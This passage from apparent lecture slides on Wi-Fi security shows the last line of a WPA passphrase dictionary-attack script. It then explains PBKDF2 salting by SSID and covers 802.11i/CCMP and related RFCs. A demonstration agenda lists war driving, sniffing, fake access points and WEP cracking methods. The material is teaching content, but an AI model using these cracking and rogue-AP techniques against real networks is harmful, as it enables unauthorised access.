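    print("passphrase:", dictionary_attack(words, observed))
```

The cost per candidate is dominated by the 4096-round PBKDF2, and the salt is the SSID, so a precomputed table only helps against networks with the same (usually default) SSID; this is why a non-default SSID plus a long random passphrase is the standard advice for pre-shared mode.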

60 802.11i
Robust Security Network extends WPA.
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP): based on a mode of AES, with 128-bit keys and a 48-bit packet number used as the IV.
Also adds dynamic negotiation of authentication and encryption algorithms, allowing for future change.
Does require new hardware.

61 Relevant RFCs
RADIUS Extensions: RFC 2869.
EAP: RFC 2284 (since obsoleted by RFC 3748).
EAP-TLS: RFC 2716 (since obsoleted by RFC 5216).

62 Demonstration
War driving. Packet sniffing. Faking APs.
Cracking WEP: brute force, dictionary attack, FMS / h1kari attack.
Airsnarf? Packet injection?

